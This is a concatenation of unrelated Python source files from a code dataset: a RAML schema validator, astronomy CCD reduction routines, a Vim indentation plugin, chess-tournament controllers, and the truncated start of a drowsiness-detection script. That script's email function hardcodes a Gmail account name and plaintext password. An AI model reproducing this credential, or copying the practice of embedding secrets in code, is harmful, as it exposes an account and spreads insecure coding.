SchemaValidationError(\"Schema is valid JSON, but not valid JSON Schema\", context=context, exception=e)\n\n except jsonschema.exceptions.ValidationError as e:\n raise ExampleVsSchemaValidationError(\"The example is not valid per this schema\", context=context, exception=e)\n\n else:\n raise UnknownSchemaType(\"Can't test schema {}\".format(schema['$schema']), context=context)\n\n except Empty as e:\n if not args.ignoremissing:\n raise e\n except SchemaValidationError as e:\n if not args.ignoreinvalidschema:\n raise e\n\n\ndef check_body(body, verb=None, path=None, ctx=None):\n \"\"\"\n A RamlBody is a set of Formats comprised of a Schema and Example, either in the Request or Response sections\n :param body:\n :return:\n \"\"\"\n if body is None:\n # A body isn't strictly required. For example, the server may respond with a HTTP 200 with no JSON\n # logging.warning(\"MissingBody: {} {} {}\".format(verb, path, ctx))\n # stats['MissingBody'] += 1\n return\n\n for mime in body:\n critical = None\n try:\n test_example_against_schema(body[mime].example, body[mime].schema, verb, path, ctx)\n except Empty as e:\n logging.warning(str(e))\n critical = e.innerexception # unpack inner exception, such as a jsonschema.exceptions.SchemaError\n except TestValidationError as e:\n logging.error(str(e))\n critical = e.innerexception # unpack inner exception, such as a jsonschema.exceptions.SchemaError\n if critical and args.fastfail:\n raise critical\n\n\ndef skipis(resource, islist, name=\"\"):\n if resource.is_:\n for isness in resource.is_:\n if isness in islist:\n # logging.debug(\"Ignoring %s for isness %s\" % (name, isness))\n return True\n return False\n\n\ndef check_resources(resources, name=\"\"):\n for resource in resources:\n isness = []\n\n if args.skipis and skipis(resources[resource], args.skipis, name=(name + resource)):\n stats['skipis'] += 1\n continue\n\n isness = resources[resource].is_ or []\n if 'internal' not in isness and 'supported' not in isness and 'techPreview' not in isness:\n isness.append(\"supported\")\n if 'authenticated' in isness:\n isness.remove('authenticated') # unimportant for logging\n\n supportedResource = \"[%s]\" % \",\".join(isness)\n if resources[resource].methods:\n for method in resources[resource].methods:\n m = resources[resource].methods[method]\n if method != 'get':\n check_body(m.body, method, name + resource)\n\n for response in m.responses:\n if str(response) in args.skipresponse:\n stats['skipresponse'] += 1\n continue\n check_body(m.responses[response].body, method, name + resource, \"response-\" + str(response))\n\n if resources[resource].resources:\n check_resources(resources[resource].resources, name + resource)\n\n\ndef check_raml_file(ramlfile_path):\n import pyraml.parser\n\n root = pyraml.parser.load(ramlfile_path)\n\n check_resources(root.resources)\n\n return root\n\n\ndef parse_url_response(raml, verb, route, response, status=200, contenttype='application/json'):\n routechunks = route.split('/')[1:]\n\n resource = raml\n for _ in routechunks:\n resource = resource.resources['/' + _]\n\n body = resource.methods[verb].responses[status].body[contenttype]\n return test_example_against_schema(response, body.schema, verb=verb, path=route, ctx=\"example\")\n\n\nif __name__ == \"__main__\":\n global args\n\n logger = logging.getLogger()\n logger.setLevel(logging.DEBUG)\n ch = logging.StreamHandler(sys.stderr)\n formatter = logging.Formatter(u'%(asctime)s %(name)s[%(process)d] %(levelname)s %(message)s')\n ch.setFormatter(formatter)\n logger.addHandler(ch)\n\n try:\n import coloredlogs\n coloredlogs.install(level='DEBUG', fmt=u'%(asctime)s %(name)s[%(process)d] %(levelname)s %(message)s')\n except ImportError:\n pass # if we don't get colors, that's not a big deal\n\n parser = argparse.ArgumentParser()\n\n parser.add_argument(\"filename\",\n help=\"Existing RAML file to be read. Required.\")\n parser.add_argument(\"--fastfail\", action=\"store_true\", default=False,\n help=\"Instead of processing all items, halt with the first exception.\")\n parser.add_argument(\"--quiet\", action=\"store_true\", default=False,\n help=\"Don't report success.\")\n parser.add_argument(\"--ignoreinvalidschema\", action=\"store_true\", default=False,\n help=\"If the schema is invalid, ignore it.\")\n parser.add_argument(\"--ignoremissing\", action=\"store_true\", default=False,\n help=\"If the schema/example is Blank or {}, ignore it.\")\n parser.add_argument(\"--no3\", action=\"store_true\", default=False,\n help=\"Treat JSONSchema Draft 3 as an error.\")\n parser.add_argument(\"--skipis\", action=\"append\", default=[],\n help=\"ignore any resource which 'is' in this list; e.g., techPreview\")\n parser.add_argument(\"--skipresponse\", action=\"append\", default=[],\n help=\"ignore any resource response in this list; e.g., 404\")\n # supported\n\n args = parser.parse_args()\n if args.filename is None:\n parser.error(\"filename required\")\n\n parsedramlroot = check_raml_file(args.filename)\n logger.info(stats)\n\n example = \"\"\"{\n \"masterAddress\": \"10.0.0.123\",\n \"masterUiPort\": 80,\n \"workerAddress\": \"10.0.0.124\",\n \"workerPort\": 16520,\n \"workerToken\": \"0ae94cb9-550a-4c01-85b9-3b7095e92321\"\n }\"\"\"\n\n # commented out as it modifies global state\n # assert(parse_url_response(raml=parsedramlroot, verb='post', route='/deployment/join', status=200, response=example))\n\n\n # try to construct individually\n for splice_schema in known_schemas:\n logging.warning(\"Trying to create %s\" % splice_schema['id'])\n o = python_jsonschema_objects.ObjectBuilder(splice_schema)\n c = o.classes\n logging.warning(\"Done create %s\" % splice_schema['id'])\n\n logging.warning(\"All done!\")\n\n # try to construct mega-schema\n\n schema={\n \"$schema\": \"http://json-schema.org/draft-04/schema#\",\n \"id\": \"http://vmware.com/go/loginsight/api/raml\",\n #\"title\": \"Something\",\n #\"type\": \"object\",\n #\"oneOf\": [],\n \"definitions\": {},\n \"name\": \"ASDF\",\n \"properties\": {\n \"schemaversion\": {\n \"type\": \"string\",\n \"default\": \"a7f49308cccfa22a440bc2d519883853bbf2174c\",\n #\"enum\": [\"a7f49308cccfa22a440bc2d519883853bbf2174c\"]\n }\n }\n }\n\n from pprint import pprint\n\n cnt=0\n for splice_schema in known_schemas:\n print(\"Splicing in %s\" % splice_schema['id'])\n if splice_schema['id'] in schema['definitions']:\n logger.warning(\"%s already in schema[definitions]!\" % splice_schema['id'], splice_schema)\n continue\n schema['definitions'][splice_schema['id']] = splice_schema\n #schema['oneOf'].append({\n # \"$ref\": \"#/definitions/%s\" % splice_schema['id']\n #})\n\n\n if 'definitions' in splice_schema:\n # child definitions\n for d in splice_schema['definitions']:\n if d in schema['definitions']:\n logger.warning(\"%s already in schema[definitions]!\" % splice_schema['id'], splice_schema)\n schema['definitions'][d] = splice_schema['definitions'][d]\n\n\n logger.warning(\"Trying to build with %d definitions! %s\" % (len(schema['definitions']), str(schema['definitions'].keys())))\n o = python_jsonschema_objects.ObjectBuilder(schema)\n c = o.classes\n\n\n #with open(\"render.json\", 'w') as f:\n # pprint(schema, stream=f)\n\n\n\n\n\n\n","sub_path":"utils/RenderModels.py","file_name":"RenderModels.py","file_ext":"py","file_size_in_byte":11523,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"433259505","text":"#\n# gemini_python\n#\n# primitives_ccd.py\n# ------------------------------------------------------------------------------\nfrom datetime import datetime\n\nimport numpy as np\n\nfrom astropy.modeling import models, fitting\nfrom scipy.interpolate import UnivariateSpline, LSQUnivariateSpline\n\nfrom astrodata.provenance import add_provenance\nfrom astrodata import wcs as adwcs\nfrom gempy.gemini import gemini_tools as gt\n\nfrom geminidr import PrimitivesBASE\nfrom recipe_system.utils.md5 import md5sum\nfrom . import parameters_ccd\n\nfrom recipe_system.utils.decorators import parameter_override\n# ------------------------------------------------------------------------------\n@parameter_override\nclass CCD(PrimitivesBASE):\n \"\"\"\n This is the class containing all of the primitives used for generic CCD\n reduction.\n \"\"\"\n tagset = None\n\n def __init__(self, adinputs, **kwargs):\n super().__init__(adinputs, **kwargs)\n self._param_update(parameters_ccd)\n\n def biasCorrect(self, adinputs=None, suffix=None, bias=None, do_bias=True):\n \"\"\"\n The biasCorrect primitive will subtract the science extension of the\n input bias frames from the science extension of the input science\n frames. The variance and data quality extension will be updated, if\n they exist. If no bias is provided, getProcessedBias will be called\n to ensure a bias exists for every adinput.\n\n Parameters\n ----------\n suffix: str\n suffix to be added to output files\n bias: str/list of str\n bias(es) to subtract\n do_bias: bool\n perform bias subtraction?\n \"\"\"\n log = self.log\n log.debug(gt.log_message(\"primitive\", self.myself(), \"starting\"))\n timestamp_key = self.timestamp_keys[self.myself()]\n\n if not do_bias:\n log.warning(\"Bias correction has been turned off.\")\n return adinputs\n\n if bias is None:\n self.getProcessedBias(adinputs, refresh=False)\n bias_list = self._get_cal(adinputs, 'processed_bias')\n else:\n bias_list = bias\n\n # Provide a bias AD object for every science frame\n for ad, bias in zip(*gt.make_lists(adinputs, bias_list, force_ad=True)):\n if ad.phu.get(timestamp_key):\n log.warning(\"No changes will be made to {}, since it has \"\n \"already been processed by biasCorrect\".\n format(ad.filename))\n continue\n\n if bias is None:\n if 'qa' in self.mode:\n log.warning(\"No changes will be made to {}, since no \"\n \"bias was specified\".format(ad.filename))\n continue\n else:\n raise OSError('No processed bias listed for {}'.\n format(ad.filename))\n\n try:\n gt.check_inputs_match(ad, bias, check_filter=False,\n check_units=True)\n except ValueError:\n bias = gt.clip_auxiliary_data(ad, aux=bias, aux_type='cal')\n # An Error will be raised if they don't match now\n gt.check_inputs_match(ad, bias, check_filter=False,\n check_units=True)\n\n log.fullinfo('Subtracting this bias from {}:\\n{}'.\n format(ad.filename, bias.filename))\n ad.subtract(bias)\n\n # Record bias used, timestamp, and update filename\n ad.phu.set('BIASIM', bias.filename, self.keyword_comments['BIASIM'])\n gt.mark_history(ad, primname=self.myself(), keyword=timestamp_key)\n ad.update_filename(suffix=suffix, strip=True)\n if bias.path:\n add_provenance(ad, bias.filename, md5sum(bias.path) or \"\", self.myself())\n\n timestamp = datetime.now()\n return adinputs\n\n def overscanCorrect(self, adinputs=None, **params):\n adinputs = self.subtractOverscan(adinputs,\n **self._inherit_params(params, \"subtractOverscan\"))\n adinputs = self.trimOverscan(adinputs, suffix=params[\"suffix\"])\n return adinputs\n\n def subtractOverscan(self, adinputs=None, **params):\n \"\"\"\n This primitive subtracts the overscan level from the image. The\n level for each row (currently the primitive requires that the overscan\n region be a vertical strip) is determined in one of the following\n ways, according to the *function* and *order* parameters:\n\n \"poly\": a polynomial of degree *order* (1=linear, etc)\n \"spline\": using *order* equally-sized cubic spline pieces or, if\n order=None or 0, a spline that provides a reduced chi^2=1\n \"none\": no function is fit, and the value for each row is determined\n by the overscan pixels in that row\n\n The fitting is done iteratively but, in the first instance, a running\n median of the rows is calculated and rows that deviate from this median\n are rejected (and used in place of the actual value if function=\"none\")\n\n Parameters\n ----------\n suffix: str\n suffix to be added to output files\n niterate: int\n number of rejection iterations\n high_reject: float/None\n number of standard deviations above which to reject high pixels\n low_reject: float/None\n number of standard deviations above which to reject low pixels\n nbiascontam: int/None\n number of columns adjacent to the illuminated region to reject\n function: str/None\n function to fit (\"poly\" | \"spline\" | \"none\")\n order: int/None\n order of polynomial fit or number of spline pieces\n \"\"\"\n log = self.log\n log.debug(gt.log_message(\"primitive\", self.myself(), \"starting\"))\n timestamp_key = self.timestamp_keys[self.myself()]\n\n sfx = params[\"suffix\"]\n niterate = params[\"niterate\"]\n lo_rej = params[\"low_reject\"]\n hi_rej = params[\"high_reject\"]\n order = params[\"order\"] or 0 # None is the same as 0\n func = (params[\"function\"] or 'none').lower()\n nbiascontam = params[\"nbiascontam\"]\n\n for ad in adinputs:\n if ad.phu.get(timestamp_key):\n log.warning(\"No changes will be made to {}, since it has \"\n \"already been processed by subtractOverscan\".\n format(ad.filename))\n continue\n\n osec_list = ad.overscan_section()\n dsec_list = ad.data_section()\n for ext, osec, dsec in zip(ad, osec_list, dsec_list):\n x1, x2, y1, y2 = osec.x1, osec.x2, osec.y1, osec.y2\n if x1 > dsec.x1: # Bias on right\n x1 += nbiascontam\n x2 -= 1\n else: # Bias on left\n x1 += 1\n x2 -= nbiascontam\n\n row = np.arange(y1, y2)\n data = np.mean(ext.data[y1:y2, x1:x2], axis=1)\n # Weights are used to determine number of spline pieces\n # should be the estimate of the mean\n wt = np.sqrt(x2 - x1) / ext.read_noise()\n if ext.is_in_adu():\n wt *= ext.gain()\n\n medboxsize = 2 # really 2n+1 = 5\n for iter in range(niterate+1):\n # The UnivariateSpline will make reduced-chi^2=1 so it will\n # fit bad rows. Need to mask these before starting, so use a\n # running median. Probably a good starting point for all fits.\n if iter == 0 or func == 'none':\n medarray = np.full((medboxsize * 2 + 1, y2 - y1), np.nan)\n for i in range(-medboxsize, medboxsize + 1):\n mx1 = max(i, 0)\n mx2 = min(y2 - y1, y2 - y1 + i)\n medarray[medboxsize + i, mx1:mx2] = data[:mx2 - mx1]\n runmed = np.ma.median(np.ma.masked_where(np.isnan(medarray),\n medarray), axis=0)\n residuals = data - runmed\n sigma = np.sqrt(x2 - x1) / wt # read noise\n\n mask = np.logical_or(residuals > hi_rej * sigma\n if hi_rej is not None else False,\n residuals < -lo_rej * sigma\n if lo_rej is not None else False)\n\n # Don't clip any pixels if iter==0\n if func == 'none' and iter < niterate:\n # Replace bad data with running median\n data = np.where(mask, runmed, data)\n elif func != 'none':\n if func == 'spline':\n if order:\n # Equally-spaced knots (like IRAF)\n knots = np.linspace(row[0], row[-1], order+1)[1:-1]\n bias = LSQUnivariateSpline(row[~mask], data[~mask], knots)\n else:\n bias = UnivariateSpline(row[~mask], data[~mask],\n w=[wt]*np.sum(~mask))\n else:\n bias_init = models.Chebyshev1D(degree=order,\n c0=np.median(data[~mask]))\n fit_f = fitting.LinearLSQFitter()\n bias = fit_f(bias_init, row[~mask], data[~mask])\n\n residuals = data - bias(row)\n sigma = np.std(residuals[~mask])\n\n # using \"-=\" won't change from int to float\n if func != 'none':\n data = bias(np.arange(0, ext.data.shape[0]))\n ext.data = ext.data - np.tile(data,\n (ext.data.shape[1],1)).T.astype(np.float32)\n\n ext.hdr.set('OVERSEC', '[{}:{},{}:{}]'.format(x1+1,x2,y1+1,y2),\n self.keyword_comments['OVERSEC'])\n ext.hdr.set('OVERSCAN', np.mean(data),\n self.keyword_comments['OVERSCAN'])\n ext.hdr.set('OVERRMS', sigma, self.keyword_comments['OVERRMS'])\n\n # Timestamp, and update filename\n gt.mark_history(ad, primname=self.myself(), keyword=timestamp_key)\n ad.update_filename(suffix=sfx, strip=True)\n\n return adinputs\n\n def trimOverscan(self, adinputs=None, suffix=None):\n \"\"\"\n The trimOverscan primitive trims the overscan region from the input\n AstroData object and updates the headers.\n\n Parameters\n ----------\n suffix: str\n suffix to be added to output files\n \"\"\"\n log = self.log\n log.debug(gt.log_message(\"primitive\", self.myself(), \"starting\"))\n timestamp_key = self.timestamp_keys[self.myself()]\n\n for ad in adinputs:\n if ad.phu.get(timestamp_key) is not None:\n log.warning('No changes will be made to {}, since it has '\n 'already been processed by trimOverscan'.\n format(ad.filename))\n continue\n\n ad = gt.trim_to_data_section(ad,\n keyword_comments=self.keyword_comments)\n # HACK! Need to update FITS header because imaging primitives edit it\n if 'IMAGE' in ad.tags:\n for ext in ad:\n if ext.wcs is not None:\n wcs_dict = adwcs.gwcs_to_fits(ext, ad.phu)\n ext.hdr.update(wcs_dict)\n\n # Set keyword, timestamp, and update filename\n ad.phu.set('TRIMMED', 'yes', self.keyword_comments['TRIMMED'])\n gt.mark_history(ad, primname=self.myself(), keyword=timestamp_key)\n ad.update_filename(suffix=suffix, strip=True)\n return adinputs\n","sub_path":"geminidr/core/primitives_ccd.py","file_name":"primitives_ccd.py","file_ext":"py","file_size_in_byte":12433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"353487639","text":"import _vim\n\ndef go_down():\n return _go(1)\n\ndef go_up():\n return _go(-1)\n\ndef _go(direction):\n line_level = get_next_line_level(direction)\n if line_level == None:\n return\n\n line, level = line_level\n _vim.goto(line, level)\n\n\ndef get_next_line_level(direction):\n current_line = _vim.line_number()\n current_level = get_level(current_line)\n\n next_line = current_line\n while True:\n next_line += direction\n\n if direction == 1 and next_line > len(_vim.buffer()):\n return None\n\n if direction == -1 and next_line <= 0:\n return None\n\n next_level = get_level(next_line)\n if next_level != current_level:\n return (next_line, next_level)\n\n\ndef get_level(line_number):\n line = _vim.buffer()[line_number]\n column = 0\n for symbol in line:\n if symbol == \"\\t\":\n column += 1\n\n return column\n","sub_path":"pythonx/indentation/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"561358560","text":"import models\nimport views\nimport db\nimport re\nimport os\n\n\n# Controlleur du menu principal\nclass Main_menu_controller:\n def __init__(self):\n self.view = views.Views()\n self.choices = {\n \"1\": self.create_tournament,\n \"2\": self.add_player,\n \"3\": self.edit_player,\n \"4\": self.start_round,\n \"5\": self.generate_reports,\n \"6\": self.import_data\n }\n self.players_created = 0\n self.player_instances = []\n self.tournament_created = 0\n self.tournament_instance = None\n self.current_round = 0\n self.round_instances = []\n\n def run(self):\n while True:\n '''On vérifie si les 4 rounds du tournoi on été joués. Si oui, on reset certaines valeurs\n afin de pouvoir créer un tournoi suivant'''\n if len(self.round_instances) == 4:\n self.players_created = 0\n self.player_instances = []\n self.tournament_created = 0\n self.tournament_instance = None\n self.current_round = 0\n self.round_instances = []\n go_to = self.view.main_menu_view(\n self.players_created, self.tournament_created, self.current_round,\n self.tournament_instance, db.database.name)\n action = self.choices.get(go_to)\n if action:\n action()\n else:\n views.Views().wrong_input_view(go_to)\n\n def create_tournament(self):\n view = views.Tournament_views()\n if self.tournament_created == 0:\n tournament_data = view.create_tournament_view()\n tc = Tournament_controller(tournament_data)\n if tc.is_data_valid():\n tournament = models.Tournament(*tournament_data)\n view.success_message_tournament(tournament.name)\n self.tournament_created += 1\n self.tournament_instance = tournament\n tournament.save_to_db()\n else:\n '''A tournament has already been created'''\n view.already_created_view()\n\n def add_player(self):\n if self.tournament_instance is None:\n return views.Views().error_step_view()\n view = views.Players_views()\n if self.players_created <= 7:\n player_data = view.create_player_view(self.players_created + 1)\n pc = Player_controller(player_data)\n if pc.is_data_valid():\n player = models.Player(*player_data)\n view.success_message_player(player.first_name, player.last_name)\n self.players_created += 1\n self.player_instances.append(player)\n player.save_to_db()\n self.tournament_instance.update_players_list(player)\n else:\n '''More than 8 players have already been created'''\n view.too_many_players_view()\n\n def edit_player(self):\n edit_player_controller = Edit_player_menu_controller(\n self.player_instances)\n edit_player_controller.run()\n\n def start_round(self):\n view = views.Rounds_views()\n # The round cannot start if one of the 3 conditions below is met\n if self.players_created < 8:\n return view.not_enough_players_view()\n if self.tournament_created == 0:\n return view.no_tournament_created_view()\n if self.current_round == 4:\n return view.no_more_round_view()\n\n round_name = view.start_round_view(self.current_round)\n my_round = models.Round(round_name, self.tournament_instance.id)\n self.round_instances.append(my_round)\n\n # Generate paires first round\n if self.current_round == 0:\n my_round.generer_paires_round1(self.player_instances)\n\n # Generate paires following rounds\n else:\n my_round.generer_paires_next_rounds(self.player_instances)\n\n # Display matches list\n match_list = my_round.match_instances\n view.display_matches_view(match_list)\n\n # Set the round results\n rc = Set_matches_results_menu_controller(match_list)\n rc.run()\n\n my_round.set_end_time()\n self.tournament_instance.update_rounds_list(my_round)\n self.current_round += 1\n\n def generate_reports(self):\n grmc = Generate_reports_menu_controller()\n grmc.run()\n\n def import_data(self):\n idmc = Import_data_menu_controller()\n players, tournaments, valid_json_file = idmc.run()\n\n if valid_json_file is False:\n # db file is not valid. Go back to main menu\n return\n elif len(tournaments) == 0:\n # db file is empty\n self.player_instances.clear()\n self.players_created = 0\n self.tournament_created = 0\n self.tournament_instance = None\n self.current_round = 0\n self.round_instances = []\n return\n\n def get_player_inst_from_id(id):\n players_list = self.player_instances\n result = [player for player in players_list if player.id == id]\n return result[0]\n\n # Import basic tournament data\n self.tournament_created = len(tournaments)\n last_tournament = len(tournaments) - self.tournament_created\n self.tournament_instance = models.Tournament(\n tournaments[last_tournament][\"name\"],\n tournaments[last_tournament][\"place\"],\n tournaments[last_tournament][\"start_date\"],\n tournaments[last_tournament][\"end_date\"],\n tournaments[last_tournament][\"description\"],\n tournaments[last_tournament][\"time_control\"],\n id=tournaments[last_tournament][\"id\"])\n\n # Import players data\n self.players_created = len(players)\n self.player_instances.clear()\n for player in players:\n player_inst = models.Player(player[\"first_name\"],\n player[\"last_name\"],\n player[\"birthdate\"],\n player[\"sex\"],\n player[\"ranking\"],\n id=player[\"id\"],\n has_played_with=player[\"has_played_with\"])\n self.player_instances.append(player_inst)\n self.tournament_instance.update_players_list(player_inst)\n\n # Import rounds & matches data\n self.current_round = len(tournaments[last_tournament][\"rounds\"])\n for my_round in tournaments[last_tournament][\"rounds\"]:\n round_inst = models.Round(my_round[\"name\"],\n my_round[\"tournament_id\"],\n start_datetime=my_round[\"start_datetime\"],\n end_datetime=my_round[\"end_datetime\"])\n\n for match in my_round[\"matches_list\"]:\n p1 = get_player_inst_from_id(match[\"player1_id\"])\n p2 = get_player_inst_from_id(match[\"player2_id\"])\n match_inst = models.Match.create_from_imported_data(\n p1, p2, match[\"player1_score\"], match[\"player2_score\"])\n\n round_inst.add_match_to_matches_list(match_inst)\n\n self.tournament_instance.rounds.append(round_inst)\n self.round_instances.append(round_inst)\n\n# Controlleur du sous-menu permettant de choisir le fichier .json de la db a importer\n\n\nclass Import_data_menu_controller:\n def __init__(self):\n self.json_files = [file for file in os.listdir('.') if file.endswith('.json')]\n self.view = views.Import_views()\n self.choices = {}\n for num, file in enumerate(self.json_files, start=1):\n self.choices[str(num)] = (self.import_file, file)\n\n def run(self):\n choice = self.view.import_data(self.json_files)\n action = self.choices.get(choice)\n if action:\n return action[0](action[1])\n else:\n return 'no player', 'no tournament', False\n\n def import_file(self, file):\n players, tournaments = db.import_data_from_json(file)\n return players.all(), tournaments.all(), True\n\n# Controlleur du sous-menu permettant de chosir le joueur sur lequel on veut modifier le classement\n\n\nclass Edit_player_menu_controller:\n def __init__(self, players):\n self.view = views.Players_views()\n self.players = players\n self.choices = {}\n for num, player in enumerate(self.players, start=1):\n self.choices[str(num)] = (self.edit_player, player)\n\n def run(self):\n choice = self.view.edit_players_view(self.players)\n action = self.choices.get(choice)\n if action:\n action[0](action[1])\n else:\n views.Views().wrong_input_view(choice)\n\n def edit_player(self, player):\n new_ranking = self.view.edit_player_view(player)\n pc = Player_controller(\n [player.first_name, player.last_name, player.birthdate,\n player.sex, new_ranking])\n if pc.is_data_valid():\n player.update_ranking(int(new_ranking))\n\n# Controlleur du sous-menu permettant de choisir le match sur lequel on souhaite définir les résultats\n\n\nclass Set_matches_results_menu_controller:\n def __init__(self, matches):\n self.view = views.Matches_views()\n self.matches = matches\n self.matches_instances = []\n self.results_set = 0\n self.choices = {}\n for num, match in enumerate(self.matches, start=1):\n self.choices[str(num)] = (self.set_match_result, match)\n\n def run(self):\n while self.results_set < 4:\n choice = self.view.set_matches_result_view(self.matches)\n action = self.choices.get(choice)\n if action:\n action[0](action[1])\n else:\n views.Views().wrong_input_view(choice)\n self.run()\n\n def set_match_result(self, match):\n smc = Set_match_result_menu_controller(match)\n match_instance = smc.run()\n self.matches_instances.append(match_instance)\n my_set = set(self.matches_instances)\n self.results_set = len(my_set)\n\n# Controlleur du sous-menu permettant d'ajouter les résultats d'un match\n\n\nclass Set_match_result_menu_controller:\n def __init__(self, match):\n self.view = views.Matches_views()\n self.match = match\n self.choices = {\n \"1\": (self.set_winner, match.player1),\n \"2\": (self.set_winner, match.player2),\n \"3\": (self.set_draw, None)\n }\n\n def run(self):\n choice = self.view.set_match_result_view(self.match)\n action = self.choices.get(choice)\n if action:\n return action[0](action[1])\n else:\n views.Views().wrong_input_view(choice)\n self.run()\n\n def set_winner(self, player):\n return self.match.set_results(is_draw=False, winner=player)\n\n def set_draw(self, _):\n return self.match.set_results(is_draw=True, winner=None)\n\n# Controlleur du sous-menu permettant de choisir le rapport que l'on souhaite consulter\n\n\nclass Generate_reports_menu_controller:\n def __init__(self):\n self.view = views.Reports_views()\n self.data = db.database\n self.choices = {\n \"1\": self.get_all_players,\n \"2\": self.get_players_from_tournament,\n \"3\": self.get_all_tournaments,\n \"4\": self.get_rounds_from_tournament,\n \"5\": self.get_matches_from_tournament\n }\n\n def run(self):\n choice = self.view.choose_report_view()\n action = self.choices.get(choice)\n if action:\n action()\n else:\n views.Views().wrong_input_view(choice)\n\n def get_all_players(self):\n self.view.get_all_players_view(self.data.table('players'), None)\n\n def get_all_tournaments(self):\n self.view.get_all_tournaments_view(self.data.table('tournaments'))\n\n def get_players_from_tournament(self):\n players_list = self.data.table('players')\n final_list = []\n for tournament in self.data.table('tournaments'):\n tournament_players = tournament[\"players\"]\n for player_id in tournament_players:\n res = [\n element for element in players_list if element['id'] == player_id]\n final_list.append(res[0])\n self.view.get_all_players_view(final_list, tournament[\"name\"])\n final_list.clear()\n\n def get_rounds_from_tournament(self):\n final_list = []\n for tournament in self.data.table('tournaments'):\n for my_round in tournament[\"rounds\"]:\n final_list.append(my_round)\n self.view.get_rounds_from_tournament(\n final_list, tournament[\"name\"])\n final_list.clear()\n\n def get_matches_from_tournament(self):\n match_list = []\n\n for tournament in self.data.table('tournaments'):\n for my_round in tournament[\"rounds\"]:\n for match in my_round[\"matches_list\"]:\n match_list.append(match)\n\n for m in match_list:\n User = db.Query()\n p1 = db.database.table('players').search(\n User.id == m[\"player1_id\"])\n p2 = db.database.table('players').search(\n User.id == m[\"player2_id\"])\n m[\"p1_name\"] = p1[0][\"first_name\"] + ' ' + p1[0][\"last_name\"]\n m[\"p2_name\"] = p2[0][\"first_name\"] + ' ' + p2[0][\"last_name\"]\n\n self.view.get_matches_from_tournament(\n match_list, tournament[\"name\"])\n match_list.clear()\n\n# Controlleur permettant que les données entrées par l'utilisateur sont conforme à ce qui est attendu en db\n\n\nclass Tournament_controller:\n def __init__(self, tournament_data):\n self.tournament_data = tournament_data\n\n def is_data_valid(self):\n regex_startdate = re.match(\n '^[0-3]?[0-9]/[0-3]?[0-9]/(?:[0-9]{2})?[0-9]{2}$', self.tournament_data[2])\n regex_enddate = re.match(\n '^[0-3]?[0-9]/[0-3]?[0-9]/(?:[0-9]{2})?[0-9]{2}$', self.tournament_data[3])\n if bool(regex_startdate) and bool(regex_enddate):\n # data collected from inputs are valid\n return True\n else:\n views.Views().error_view('Format de date non valide.')\n\n# Controlleur permettant que les données entrées par l'utilisateur sont conforme à ce qui est attendu en db\n\n\nclass Player_controller:\n def __init__(self, player_data):\n self.model = models.Player\n self.player_data = player_data\n\n def is_data_valid(self):\n if self._check_valid_date() and self._check_valid_sex() and self._check_valid_rank():\n return True\n\n def _check_valid_date(self):\n regex_birthdate = re.match(\n '^[0-3]?[0-9]/[0-3]?[0-9]/(?:[0-9]{2})?[0-9]{2}$', self.player_data[2])\n if bool(regex_birthdate):\n return True\n else:\n views.Views().error_view('Format de date non valide.')\n\n def _check_valid_sex(self):\n if self.player_data[3].upper() == 'M' or self.player_data[3].upper() == 'F':\n return True\n else:\n views.Views().error_view('Sexe non valide. Veuillez entrer M ou F.')\n\n def _check_valid_rank(self):\n if self.player_data[4].isdigit():\n if int(self.player_data[4]) > 0:\n return True\n else:\n views.Views().error_view('Votre classement doit être un entier positif.')\n","sub_path":"controllers.py","file_name":"controllers.py","file_ext":"py","file_size_in_byte":15727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"14869321","text":"import win32com.client as wincl\r\nfrom scipy.spatial import distance as dist\r\nfrom imutils.video import FileVideoStream\r\nfrom imutils.video import VideoStream\r\nfrom imutils import face_utils\r\nimport numpy as np\r\nimport argparse\r\nimport imutils\r\nimport time\r\nimport dlib\r\nimport cv2\r\nimport xlwt\r\nfrom xlwt import Workbook\r\nimport urllib\r\nimport json\r\nimport random\r\nfrom threading import Thread\r\nfrom firebase import firebase\r\nimport pandas as pd\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.metrics import f1_score\r\nfrom sklearn.neural_network import MLPClassifier\r\nfrom sklearn import svm\r\ndf=pd.read_csv('H:/enginx/pycodes/foofin.csv');\r\ncol=['Speed','Bphm']\r\nX=df[col]\r\ny=df['Out']\r\nclf= LogisticRegression()\r\nclf1= RandomForestClassifier(max_depth=2,random_state=0)\r\nclf2=KNeighborsClassifier(n_neighbors=3)\r\nclf3 = MLPClassifier(solver='lbfgs', alpha=1e-5,hidden_layer_sizes=(6,2), random_state=1)\r\nclf4 = svm.SVC()\r\nclf.fit(X,y)\r\nclf1.fit(X,y)\r\nclf2.fit(X,y)\r\nclf3.fit(X,y)\r\nclf4.fit(X,y) \r\nimport os\r\nimport thingspeak\r\nimport urllib\r\nimport json\r\nimport time\r\nimport numpy as np\r\nfrom sklearn.linear_model import LogisticRegression\r\nfrom sklearn.metrics import accuracy_score\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.ensemble import RandomForestClassifier\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn.metrics import f1_score\r\nfrom sklearn.neural_network import MLPClassifier\r\nimport matplotlib.pyplot as plt\r\nimport scikitplot as skplt\r\nimport seaborn as sns\r\nfrom sklearn import svm\r\n\r\nCOUNTER = 0\r\nSND=0\r\nSND1=0\r\nTOTAL = 0\r\nTOTAL1 = 0\r\nTOTAL2=0\r\nSPEED=0\r\ni=0\r\nj=0\r\nj1=0\r\ndef convert(x):\r\n a=x.split(':')\r\n x=a[5]\r\n x=x[1:x[1:].find('\"')+1]\r\n x=int(x)\r\n return x\r\n \r\ndef send_mail(recipient, subject, message):\r\n import smtplib\r\n from email.mime.multipart import MIMEMultipart\r\n from email.mime.text import MIMEText\r\n\r\n username = \"logixpltd@gmail.com\"\r\n password = \"timebomb321\"\r\n\r\n msg = MIMEMultipart()\r\n msg['From'] = username\r\n msg['To'] = recipient\r\n msg['Subject'] = subject\r\n 